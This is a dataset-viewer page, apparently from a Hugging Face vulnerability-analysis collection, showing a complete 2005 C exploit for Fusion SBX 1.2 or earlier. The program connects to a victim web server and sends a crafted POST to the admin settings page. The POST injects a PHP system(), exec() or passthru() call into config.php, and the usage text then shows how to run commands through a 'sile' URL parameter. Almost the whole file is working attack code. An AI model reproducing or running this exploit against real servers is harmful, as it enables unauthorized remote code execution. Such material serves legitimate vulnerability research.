Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1003.txt195 linesDownload Raw Back to exploits
1/*****************************************************

2*                                                    *

3*  [Fusion SBX <= 1.2] exploit                       *

4*                                                    *

5*  sileFSBXxpl                                       *

6*                                                    *

7*  This exploit use vulnerability found into         *

8*  Fusion SBX and create new variable and call it    *

9*  with a malicious function (stored in config.php). *

10*  This exploit utilize injection of three diverse   *

11*  procedures for execution of arbitrary code on     *

12*  vulnerable machine with httpd privileges.         *

13*                                                    *

14*  References: www.securityfocus.org/bid/13575       * 

15*                                                    *

16*  coded by: Silentium of Anacron Group Italy        *

17*      date: 10/05/2005                              *

18*    e-mail: anacrongroupitaly[at]autistici[dot]org  *

19*   my_home: www.autistici.org/anacron-group-italy   *

20*                                                    *

21*  this tool is developed under GPL license          *

22*  no(c) .:. copyleft                                *

23*                                                    *

24*****************************************************/

25

26#include <stdio.h>

27#include <stdlib.h>

28#include <sys/types.h>

29#include <sys/socket.h>

30#include <netinet/in.h>

31#include <netdb.h>

32

33#define PORT 80		// port of web server 

34

35void info(void);

36void banner(void);

37void sendxpl(FILE *out, char *argv[], int type);

38void errsock(void);

39void errgeth(void);

40void errconn(char *argv[]);

41

42

43int main(int argc, char *argv[]){

44

45FILE *out;

46int sock, sockconn, type;

47struct sockaddr_in addr;

48struct hostent *hp;

49

50if(argc!=4)

51   info();

52

53type = atoi(argv[3]);

54

55if(type < 1 || type > 3)

56   info();

57

58banner();

59   

60if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)

61   errsock();

62   

63   printf("[*] Creating socket		[OK]\n");

64

65if((hp = gethostbyname(argv[1])) == NULL)

66   errgeth();

67   

68   printf("[*] Resolving victim host	[OK]\n");

69   

70memset(&addr,0,sizeof(addr));

71memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);

72addr.sin_family = AF_INET;

73addr.sin_port = htons(PORT);

74   

75sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));

76if(sockconn < 0)

77   errconn(argv);

78   

79   printf("[*] Connecting at victim host   [OK]\n");

80   

81out = fdopen(sock,"a");

82setbuf(out,NULL);

83

84sendxpl(out,argv,type);

85

86   printf("[*] Now test at execute code on\n\n" 

87          "[1] %s%sindex.php?sile=id\n"

88          "[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);

89

90shutdown(sock,2);

91close(sock);

92

93return 0;

94

95}

96

97

98void info(void){

99

100system("clear");

101printf("\n   #########################################\n"

102       "   #             sileFSBXxpl               #\n"

103       "   #  ###################################  #\n"

104       "   #       Fusion SBX <= 1.2 exploit       #\n"

105       "   #       Remote Command Execution        #\n"

106       "   #          coded by Silentium           #\n"            

107       "   #        [ Anacron Group Italy ]        #\n"

108       "   #  ###################################  #\n"

109       "   # www.autistici.org/anacron-group-italy #\n"

110       "   #########################################\n\n"

111       " [Usage]\n\n" 

112       "  sileFSBXxpl <victim> <path_sbx> <type>\n\n"

113       "        [Type]\n\n"

114       "              1) injection of system()\n"

115       "              2) injection of exec()\n"

116       "              3) injection of passthru()\n\n"

117       " [Example]\n\n"

118       "  sileFSBXxpl www.victim.com /sbx/ 1\n\n"); 

119exit(1);

120

121}

122

123

124void banner(void){

125

126system("clear");

127printf("[-] sileFSBXxpl\n"

128       "    ============\n"

129       "[-] Fusion SBX <= 1.2 exploit\n"

130       "[-] coded by Silentium - Anacron Group Italy\n"

131       "[-] www.autistici.org/anacron-group-italy\n\n");

132       

133}

134       

135

136void sendxpl(FILE *out, char *argv[], int type){

137

138char *call;

139int size = 245;

140

141if(type == 1)

142   call = "system";

143else if(type == 2)

144   call = "exec";

145else if(type == 3)

146   call = "passthru";

147

148size+=strlen(call);

149       

150fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"

151            "Connection: Keep-Alive\n"

152            "Pragma: no-cache\n"

153            "Cache-control: no-cache\n"

154            "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"

155            "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"

156            "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"

157            "Accept-Language: en\n"

158            "Host: %s\n"

159            "Content-Type: application/x-www-form-urlencoded\n"

160            "Content-Length: %d\n\n"

161            "set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"

162            "refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"

163            "2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"

164            "&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);

165                                  

166            printf("[*] Sending exploit		[OK]\n\n");

167

168}

169            

170                 

171void errsock(void){

172

173system("clear");

174printf("[x] Creating socket	[FAILED]\n\n");

175exit(1);

176

177}

178

179

180void errgeth(void){

181

182printf("[x] Resolving victim host	[FAILED]\n\n");

183exit(1);

184

185}

186

187

188void errconn(char *argv[]){

189

190printf("[x] Connecting at victim host	[FAILED]\n\n",argv[1]);

191exit(1);

192

193}

194

195// milw0rm.com [2005-05-20]